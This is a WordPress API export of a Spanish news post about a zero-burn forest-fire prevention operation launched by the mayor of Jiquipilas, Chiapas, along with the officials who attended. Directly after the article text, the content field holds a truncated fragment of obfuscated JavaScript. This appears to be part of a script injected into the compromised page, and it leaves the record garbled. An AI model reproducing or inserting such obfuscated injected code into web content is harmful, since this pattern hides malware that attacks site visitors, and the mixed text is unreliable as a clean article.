{"id":8879,"date":"2023-03-02T04:28:23","date_gmt":"2023-03-02T04:28:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8879"},"modified":"2023-03-02T04:28:24","modified_gmt":"2023-03-02T04:28:24","slug":"hugo-lazaro-encabeza-arranque-de-operativo-de-cero-quemas-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8879","title":{"rendered":"Hugo L\u00e1zaro encabeza arranque de operativo de cero quemas en Jiquipilas."},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230301-WA0026-1024x682.jpg\" alt=\"\" class=\"wp-image-8880\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230301-WA0026-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230301-WA0026-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230301-WA0026-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230301-WA0026-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/IMG-20230301-WA0026.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 El Alcalde pidi\u00f3 que se act\u00fae con responsabilidad en el tema de prevenci\u00f3n y combate de incendios para proteger el medio ambiente.\u2022 Reconoci\u00f3 las acciones emprendidas por el Gobernador Rutilio Escand\u00f3n Cadenas y el Secretario de Protecci\u00f3n Civil de Chiapas Luis Manuel Garc\u00eda Moreno en materia de prevenci\u00f3n.  Jiquipilas, Chiapas. \u2013 El Alcalde Hugo L\u00e1zaro Rodr\u00edguez encabez\u00f3 el operativo cero quemas con el respaldo de autoridades e instituciones de los tres \u00f3rdenes de gobierno con la finalidad de proteger los recursos forestales.Reunidos en la explanada del Palacio Municipal, el Presidente fue muy claro ante las autoridades manifestando que en Jiquipilas se ha venido actuando con estricta responsabilidad en el tema ambiental.\u201cHemos atendido de manera oportuna el llamado del Gobernador Rutilio Escand\u00f3n Cadenas y Luis Manuel Garc\u00eda Moreno Secretario de Protecci\u00f3n Civil del Estado para evitar los incendios forestales, por ello, en este operativo refrendo el compromiso de salvaguardar el ecosistema\u201d, enfatiz\u00f3.Refiri\u00f3 la importancia de la participaci\u00f3n ciudadana, sobre todo, de quienes viven en las comunidades rurales, por esa raz\u00f3n, extendi\u00f3 el llamado a los campesinos para que eviten los incendios y denuncien alguna conflagraci\u00f3n y sea atendido a tiempo.Hugo L\u00e1zaro, agradeci\u00f3 a todas las autoridades involucradas en esta cruzada por las cero quemas y pidi\u00f3 que se act\u00fae con responsabilidad en el tema de prevenci\u00f3n y combate de incendios, ya que es un tema que nos corresponde a todos.En este inicio de operativo las autoridades recorrieron diversos puntos de la cabecera municipal y las comunidades Miguel Hidalgo, Pino Su\u00e1rez, Cuauht\u00e9moc, El triunfo y Juli\u00e1n Grajales.Asistieron Uriel Peralta Ayala del 100\u00ba Batall\u00f3n de infanter\u00eda, Pedro G\u00e1lvez Hern\u00e1ndez de la Fiscal\u00eda Ambiental, Conrado Cueto Garc\u00eda de la Secretar\u00eda de Seguridad y Atenci\u00f3n Ciudadana, Sergio Salvador Moguel Guzm\u00e1n de Protecci\u00f3n Civil del Estado Regi\u00f3n II Valle zoque y el Comandante Carlos Alberto Mar\u00edn Clemente de la Secretar\u00eda de Seguridad P\u00fablica Municipal, adem\u00e1s de Carlos Cal y Mayor director de medio ambiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El Alcalde pidi\u00f3 que se act\u00fae con responsabilidad en el tema de prevenci\u00f3n y combate de incendios para proteger el medio ambiente.\u2022 Reconoci\u00f3 las acciones emprendidas por el Gobernador Rutilio Escand\u00f3n Cadenas y el Secretario de Protecci\u00f3n Civil de Chiapas Luis Manuel Garc\u00eda Moreno en materia de prevenci\u00f3n. Jiquipilas, Chiapas. \u2013 El Alcalde Hugo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8880,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8879","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8879","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8879"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8879\/revisions"}],"predecessor-version":[{"id":8881,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8879\/revisions\/8881"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8880"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8879"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8879"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8879"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}